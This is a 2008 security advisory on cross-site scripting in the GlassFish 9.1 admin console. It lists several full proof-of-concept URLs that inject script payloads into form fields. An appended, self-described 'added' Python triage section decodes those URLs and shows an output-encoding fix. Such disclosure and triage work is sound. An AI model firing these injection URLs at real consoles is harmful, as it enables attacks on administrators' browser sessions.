From:Eduardo Jorge <serrano.neves_(at)_gmail.com>
Date:16.06.2008
Subject:Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))

==============================

Multiple XSS - Glassfish Web Interface (Sun Java System Application Server 9.1_01 (build b09d-fcs))

==============================

Author: Eduardo Neves a.k.a _eth0_
Date: 14 June 2008
Site: http://webappsecurity.wordpress.com

==============================

APPLICATION : Glassfish webadmin interface
VERSION : Sun Java System Application Server 9.1_01 (build b09d-fcs)
VENDOR : http://www.sun.com
DOWNLOAD : https://glassfish.dev.java.net/

==============================

IMPACT: XSS, XSRF, etc.

Severity: Low (or not?)

==============================

Description:

Several pages of the GlassFish web admin interface (the console on port 4848) accept malicious or unexpected data in their input fields without validating or encoding it, so a script placed in one of those fields is written back into the page the console renders and runs in the administrator's browser. More than ten such input fields were found in GlassFish.

These are vulnerable URLs (the payload sits in several form fields of each page; the javax.faces.ViewState values are JSF view-state tokens that differ per session, so a tester has to substitute current ones rather than replay the URLs verbatim):

http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=customresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id276%3Aj_id282&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton


http://[HOSTNAME]:4848/resourceNode/externalResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AjndiLookupProp%3AjndiLookup=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertyContentPage%3AhelpKey=externalresourcescreate.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id289%3Aj_id293&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsDestinationNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AresTypeProp%3AresType=javax.jms.Topic&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Acb=true&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Description&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=&propertyForm%3AhelpKey=jmsdestinationnew.html%09&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id242%3Aj_id246&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/resourceNode/jmsConnectionNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3AJndi=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=javax.jms.TopicConnectionFactory&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AdescProp%3Acd=%3Cscript%3Ealert%28%27xss2%27%29%3B%3C%2Fscript%3E&propertyForm%3ApropertySheet%3AgeneralPropertySheet%3AstatusProp%3Asun_checkbox9=true&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AinitSizeProp%3Ads=8&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxProp%3Ads2=32&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AresizeProp%3Ads3=2&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AidleProp%3Ads=300&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3AmaxWaitProp%3Ads=60000&propertyForm%3ApropertySheet%3ApoolSettingsPropertySheet%3Atransprop%3Atrans=&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol2%3Acol1St=Password&propertyForm%3AbasicTable%3ArowGroup1%3A0%3Acol3%3Acol1St=guest&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol2%3Acol1St=UserName&propertyForm%3AbasicTable%3ArowGroup1%3A1%3Acol3%3Acol1St=guest&propertyForm%3AhelpKey=jmsconnectionnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id226%3Aj_id234&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%


http://[HOSTNAME]:4848/resourceNode/jdbcResourceNew.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AjndiProp%3Ajnditext=<script>alert('xss');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3ApoolNameProp%3APoolName=__CallFlowPool&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=<script>alert('xss3');</script>&propertyForm%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox9=true&propertyForm%3AhelpKey=jdbcresourcenew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id185%3Aj_id201&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton

http://[HOSTNAME]:4848/applications/lifecycleModulesNew.jsf?propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AnameProp%3Aname=<script>alert('xss');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AclassNameProp%3Aclassname=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3ApathProp%3AclassPath=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AloadOrderProp%3AloadOrder=<script>alert('xss3');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AdescProp%3Adesc=&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField%3AstatusProp%3Asun_checkbox8=true&propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2=++OK++&propertyForm%3AhelpKey=lifecyclemodules.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id117%3Aj_id125&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AbottomButtons%3AsaveButton2

http://[HOSTNAME]:4848/resourceNode/jdbcConnectionPoolNew1.jsf?propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton=+Next+&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AjndiProp%3Aname=<script>alert('xss')</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AresTypeProp%3AresType=<script>alert('xss2');</script>&propertyForm%3ApropertyContentPage%3ApropertySheet%3AgeneralPropertySheet%3AdbProp%3Adb=<script>alert('xss3');</script>&propertyForm%3AhelpKey=jdbcconnectionpoolnew1.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=j_id7%3Aj_id34&com_sun_webui_util_FocusManager_focusElementId=propertyForm%3ApropertyContentPage%3AtopButtons%3AnextButton

And others =)
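The URLs above are hard to read because JSF encodes every form-field id with %3A and the payload itself is percent-encoded. The following Python is an added triage example, not code from this advisory or from GlassFish: it decodes the first URL (customResourceNew.jsf) to list exactly which form fields carry the payload, pulls out the per-session javax.faces.ViewState token that stops the URL from replaying verbatim, and classifies how a response body treats the payload (echoed raw, entity-encoded on output, or absent). The two response bodies are constructed samples, and render_field() is an illustrative output-encoding fix, not GlassFish's own code.

```python
"""Triage helpers for reflected-input XSS reports against a JSF admin console.

Added example; not code from the advisory or from GlassFish. The response
bodies below are constructed samples, not real GlassFish output.
"""
import html
from urllib.parse import parse_qsl

PAYLOAD = "<script>alert('xss');</script>"

# URL copied from the advisory; [HOSTNAME] is kept as the author wrote it,
# so the query is taken with a plain split instead of urlsplit().
ADVISORY_URL = (
    "http://[HOSTNAME]:4848/resourceNode/customResourceNew.jsf?"
    "propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=++OK++"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AjndiProp%3AJndiNew=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AresTypeProp%3AresType=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AfactoryClassProp%3AfactoryClass=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AdescProp%3Adesc=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E"
    "&propertyForm%3ApropertyContentPage%3ApropertySheet%3ApropertSectionTextField"
    "%3AstatusProp%3Asun_checkbox9=true"
    "&propertyForm%3AhelpKey=customresourcescreate.html"
    "&propertyForm_hidden=propertyForm_hidden"
    "&javax.faces.ViewState=j_id276%3Aj_id282"
    "&com_sun_webui_util_FocusManager_focusElementId="
    "propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton"
)


def query_params(url):
    """Decode the query string into (name, value) pairs; %3A becomes ':'."""
    query = url.split("?", 1)[1] if "?" in url else ""
    return parse_qsl(query, keep_blank_values=True)


def injected_fields(url, marker="<script"):
    """Return {field name: decoded value} for every parameter carrying markup."""
    return {name: value for name, value in query_params(url)
            if marker in value.lower()}


def view_state(url):
    """The JSF javax.faces.ViewState token, or None if the URL has none."""
    for name, value in query_params(url):
        if name == "javax.faces.ViewState":
            return value
    return None


def classify_reflection(body, payload=PAYLOAD):
    """'raw' if the payload is echoed as live markup, 'escaped' if it was
    entity-encoded on output, 'absent' if it does not appear at all."""
    lowered = body.lower()
    if payload.lower() in lowered:
        return "raw"
    if "&lt;script" in lowered:
        return "escaped"
    return "absent"


def render_field(label, value):
    """Output-encode a submitted value before echoing it: the step the
    vulnerable pages lack (illustrative fix, not GlassFish's own code)."""
    return '<label>%s</label><input type="text" value="%s">' % (
        html.escape(label), html.escape(value, quote=True))


# Constructed sample responses: one echoes the field raw, one uses render_field().
VULNERABLE_BODY = '<label>JNDI Name</label><input type="text" value="%s">' % PAYLOAD
FIXED_BODY = render_field("JNDI Name", PAYLOAD)

if __name__ == "__main__":
    for name, value in injected_fields(ADVISORY_URL).items():
        print("injected:", name.rsplit(":", 1)[-1], "=", value)
    print("view state:", view_state(ADVISORY_URL))
    print("vulnerable page:", classify_reflection(VULNERABLE_BODY))
    print("fixed page:", classify_reflection(FIXED_BODY))
```

Run against the first advisory URL this reports four injected fields (JndiNew, resType, factoryClass and desc) and the view-state token j_id276:j_id282; when retesting a live console, swap that token for the one in a freshly loaded page, since a stale ViewState is rejected before the field values are ever rendered.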

--
|_|0|_| Serrano Neves - a.k.a eth0
|_|_|0| http://webappsecurity.wordpress.com
|0|0|0| "Talk is cheap. Show me the code." - Linus Torvalds
